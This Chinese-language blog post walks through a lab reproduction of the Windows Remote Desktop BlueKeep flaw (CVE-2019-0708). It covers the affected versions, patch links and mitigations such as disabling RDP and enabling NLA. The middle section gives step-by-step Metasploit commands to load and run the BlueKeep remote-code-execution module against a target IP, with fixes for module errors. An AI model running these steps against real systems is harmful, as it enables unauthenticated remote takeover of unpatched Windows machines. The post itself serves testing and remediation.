Windows远程桌面服务漏洞(CVE-2019-0708)复现测试
1、漏洞概述
2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。
2、影响范围
该漏洞影响旧版本的Windows系统,包括:
Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。
Windows 8和Windows 10及之后版本不受此漏洞影响。
3、漏洞修复测试
测试环境
将下载的exp分别放入或替换:
/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
4、Msf升级
使用命令msfupdate,按提示,apt update;
apt install Metasploit-framework,最后reload_all就可以了。
启动Metasploit
用search搜索0708,使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP模块攻击
用show options进行参数设置
这里只需要设置两项,set rhosts 目标ip(我这里是192.168.106.149),以及set target 3
set target ID数字(可选为0-4)设置受害机机器架构,wmware=3,Virtualbox=2
成功利用。
到目前公开的利用代码可用于攻击 Windows 7 SP1 x64 与 Windows 2008 R2 x64的EXP不太稳定,针对 Windows 7 SP1 x64攻击有蓝屏现象。
复现过程中出现的一些问题解决方法:
如提示Exploit failed: NameError undefined local variable or method `rdp_connect' for,则需要替换下载的exp(4个rb文件);
如提示ForceExploit错误,需要将ForceExploit设置为true;
Windows2008 R2 x64 需要修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TerminalServer\WinStations\rdpwd\fDisableCam]值为0。
5、修复漏洞更新补丁
安装微软的安全更新来给系统打上安全补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
同时针对已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新,下载地址:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
缓解措施(在无法及时安装微软安全更新的情况下作为临时性解决方案)
1.若用户不需要用到远程桌面服务,建议禁用该服务。
2.开启网络级别身份验证(NLA),此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2。
以上措施只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新。
6、相关参考
@rapid7 Add initial exploit for CVE-2019-0708, BlueKeep #12283
原创文章转载请注明出处:四维创智攻防实验室
Windows远程桌面服务漏洞(CVE-2019-0708)复现测试相关推荐
- [网络安全自学篇] 四十四.Windows远程桌面服务缺陷(CVE-2019-0708)复现及防御详解
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了木马原理知识,并通过远程服务器IPC $ 漏洞实现木马植入及控制远程服 ...
- 远程exp_Windows远程桌面服务漏洞(CVE-2019-0708)攻击代码现身
事件概况 5月15日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的修复程序,该漏洞影响某些旧版本的Windows.目前利用该漏洞的EXP代码已被公开发布至metaspl ...
- win2003服务器漏洞要修复吗,微软紧急发布Windows远程桌面高危漏洞补丁 涉及XP 2003...
微软应急响应中心近日披露了WindowsServer2003,WindowsServer2008R2及WindowsServer2008的操作系统版本上存在的一个高危安全风险(漏洞编号:CVE-201 ...
- 解决Windows远程桌面服务无法复制粘贴:重启rdpclip.exe
在连接到远程服务器后,即使选择了"本地资源"选项卡里的"剪贴板"功能,仍然无法复制粘贴,通过百度找到了解决办法,原因在于远程服务器上的rdpclip.exe 工 ...
- 远程桌面最新漏洞CVE-2019-0708 POC利用复现
POC有点鸡肋,并没有蓝屏!!! POC运行环境: Python 3.5.6 |Anaconda 4.2.0 (64-bit)| (default, Aug 26 2018, 16:05:27) [M ...
- 微软远程桌面服务远程代码执行漏洞
人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当 ...
- 【Windows Server 2019】发布服务器 | 远程桌面服务的安装与配置 Ⅱ——配置RemoteAPP和访问
目录 4. 配置RemoteAPP 4.2 设置要发布的APP 4.1 如何找到访问链接 5. 访问发布的RemoteAPP 关联博文 4. 配置RemoteAPP 4.2 设置要发布的APP (1) ...
- 【Windows Server 2019】发布服务器 | 远程桌面服务的安装与配置 Ⅰ——理论,实验拓扑和安装基于RemoteAPP的RDS
目录 1. 理论 1.1 什么是远程桌面服务 2. 实验拓扑 2.1 拓扑说明 3. 安装基于RemoteAPP的RDS 关联博文 1. 理论 1.1 什么是远程桌面服务 远程桌面服务 (RDS) 是 ...
- Windows Server 2019服务器远程桌面服务部署+深度学习环境配置教程
文章目录 1.安装Windows Server 2019 2.开启WLAN服务 3.固定IP地址 4.开启远程桌面服务 4.1 添加远程桌面服务 4.2 激活服务器 4.3 安装许可证 5.配置远程桌 ...
最新文章
- Android深度探索与驱动开发(一)
- 对话AI大师Bengio:AI不应变成军备竞赛
- HDFS上传文件报错java.lang.InterruptedException
- java压缩文件出现中文乱码问题
- Linux中输入输出重定向和管道
- HDU 3530 Subsequence
- WCF Rest Service
- 什么是面向对象_什么是面向对象?新手程序员必掌握的技能
- 字符串处理 —— 概述
- html5-svg和Two.js的使用方法(附案例)
- 重大改革!Python将被加入高考科目!
- SQL课堂笔记--索引和视图
- visual studio 2015 无法打开源文件“stdafx.h“
- Excel连接数据库
- 李开复:几年内电子商务上市潮会来临
- 车载电子电源设计简单总结
- 机器学习系列(三)——目标函数、损失函数以及代价函数
- 根据物理公式在Unity中实现抛物线运动.2
- 软件测试等价类划分以及边界值
- 开源世界里的重要理念:上游优先(UpStream First)